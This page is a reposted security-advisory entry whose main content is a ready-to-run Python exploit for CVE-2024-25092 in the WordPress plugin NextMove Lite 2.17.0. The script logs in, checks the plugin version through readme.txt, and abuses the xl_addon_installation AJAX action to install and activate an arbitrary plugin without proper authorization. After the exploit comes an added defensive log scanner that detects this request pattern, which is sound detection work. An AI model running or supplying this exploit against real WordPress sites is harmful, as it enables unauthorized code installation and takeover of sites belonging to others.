WordPress NextMove Lite 2.17.0 Missing Authorization
This article provides a Python script for exploiting a vulnerability in the WordPress plugin NextMove Lite 2.17.0 (CVE-2024-25092) by logging in, checking the version, and uploading a malicious plugin. 2025-3-13 17:51:14 Author: cxsecurity.com

    import requests
    import argparse

    # Exploit script for CVE-2024-25092 By Nxploit Khaled Alenazi.


    def login(session, url, username, password, user_agent):
        # Authenticate through the standard WordPress login form.
        login_url = url + '/wp-login.php'
        response = session.post(login_url, verify=False, data={
            'log': username,
            'pwd': password,
            'rememberme': 'forever',
            'wp-submit': 'Log+In'
        }, headers={"User-Agent": user_agent})
        # A wordpress_logged_in cookie indicates the login succeeded.
        if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
            print("Logged in successfully.")
        else:
            print("Failed to log in.")
            exit()


    def check_version(session, url, user_agent):
        # Read the plugin's readme.txt and look for the affected stable tag.
        version_url = url + '/wp-content/plugins/woo-thank-you-page-nextmove-lite/readme.txt'
        response = session.get(version_url, verify=False, headers={"User-Agent": user_agent})
        if response.status_code == 200:
            if 'Stable tag: 2.17.0' in response.text:
                print("Site is vulnerable... Exploiting and uploading plugin")
            else:
                print("Site is not vulnerable.")
                exit()
        else:
            print("Failed to check version.")
            exit()


    def install_plugin(session, url, plugin, user_agent):
        # Send the plugin's xl_addon_installation AJAX action with the chosen slug.
        exploit_url = url + '/wp-admin/admin-ajax.php'
        exploit_data = {
            'action': 'xl_addon_installation',
            'xl_slug': plugin,
            'xl_file': '/plugin.php'
        }
        headers = {
            "User-Agent": user_agent,
            "Accept": "*/*",
            "Accept-Language": "en-US,en;q=0.5",
            "Accept-Encoding": "gzip, deflate, br",
            "Referer": url + '/wp-admin/admin.php?page=xl-cart',
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "X-Requested-With": "XMLHttpRequest",
            "Origin": url,
            "Connection": "keep-alive",
            "Cookie": '; '.join([f"{cookie.name}={cookie.value}" for cookie in session.cookies])
        }
        response = session.post(exploit_url, data=exploit_data, headers=headers, verify=False)
        if response.status_code == 200:
            print(f"Plugin '{plugin}' installed and activated successfully.")
        else:
            print("Failed to upload plugin.")


    def main():
        parser = argparse.ArgumentParser(description='Exploit script for CVE-2024-25092 By Nxploit Khaled Alenazi.')
        parser.add_argument('-u', '--url', required=True, help='Target URL')
        parser.add_argument('-un', '--username', required=True, help='Username')
        parser.add_argument('-p', '--password', required=True, help='Password')
        parser.add_argument('-pl', '--plugin', default='cart-for-woocommerce', help='Plugin to install (default: cart-for-woocommerce)')
        args = parser.parse_args()

        user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
        requests.packages.urllib3.disable_warnings()

        session = requests.Session()
        session.verify = False

        login(session, args.url, args.username, args.password, user_agent)
        check_version(session, args.url, user_agent)
        install_plugin(session, args.url, args.plugin, user_agent)


    if __name__ == "__main__":
        main()

References:

https://github.com/Nxploited/CVE-2024-25092/blob/main/CVE-2024-25092.py
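
A defensive counterpart to the script above, added here as an example and not part of the original post: it scans request logs for the xl_addon_installation AJAX call the script sends and notes whether the same client first fetched the plugin's readme.txt. The log schema, the role field, the 300-second window and treating non-administrator sessions as the high-severity case are assumptions; the sample events are constructed.

```python
import json
from urllib.parse import parse_qs

# Path and action name exactly as they appear in the script on this page.
README = "/wp-content/plugins/woo-thank-you-page-nextmove-lite/readme.txt"
AJAX = "/wp-admin/admin-ajax.php"
ACTION = "xl_addon_installation"
PROBE_WINDOW = 300  # seconds between readme fetch and AJAX call (assumed value)

# Constructed sample events. The JSON schema (ts, ip, role, method, path, body)
# is an assumption: a WAF or audit log that records POST bodies and the WP role.
SAMPLE_LOG = """\
{"ts": 1000, "ip": "198.51.100.7", "role": "subscriber", "method": "GET", "path": "/wp-content/plugins/woo-thank-you-page-nextmove-lite/readme.txt", "body": ""}
{"ts": 1002, "ip": "198.51.100.7", "role": "subscriber", "method": "POST", "path": "/wp-admin/admin-ajax.php", "body": "action=xl_addon_installation&xl_slug=cart-for-woocommerce&xl_file=%2Fplugin.php"}
{"ts": 1500, "ip": "203.0.113.9", "role": "administrator", "method": "POST", "path": "/wp-admin/admin-ajax.php", "body": "action=xl_addon_installation&xl_slug=cart-for-woocommerce&xl_file=%2Fplugin.php"}
{"ts": 1600, "ip": "203.0.113.20", "role": "subscriber", "method": "POST", "path": "/wp-admin/admin-ajax.php", "body": "action=heartbeat"}
not-json garbage line
"""

def find_addon_installs(log_text):
    """One finding per xl_addon_installation request; non-admin sessions are 'high'."""
    last_probe, findings = {}, []  # last_probe: ip -> ts of latest readme fetch
    for line in log_text.splitlines():
        try:
            ev = json.loads(line)
            path = ev.get("path", "").split("?", 1)[0]
        except (ValueError, AttributeError):
            continue  # malformed or non-object line
        ip, ts = ev.get("ip"), ev.get("ts", 0)
        if ev.get("method") == "GET" and path == README:
            last_probe[ip] = ts
            continue
        if ev.get("method") != "POST" or path != AJAX:
            continue
        form = parse_qs(ev.get("body", ""))
        if ACTION not in form.get("action", []):
            continue
        findings.append({
            "ts": ts, "ip": ip,
            "slug": form.get("xl_slug", [""])[0],
            "file": form.get("xl_file", [""])[0],
            "severity": "high" if ev.get("role") != "administrator" else "review",
            "preceded_by_version_probe": ts - last_probe.get(ip, float("-inf")) <= PROBE_WINDOW,
        })
    return findings

if __name__ == "__main__":
    for finding in find_addon_installs(SAMPLE_LOG):
        print(finding)
```

Standard access logs do not record POST bodies, so this check needs a source that does; without one, only the readme.txt fetch followed by a POST to admin-ajax.php is visible.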




 



Source: https://cxsecurity.com/issue/WLB-2025030017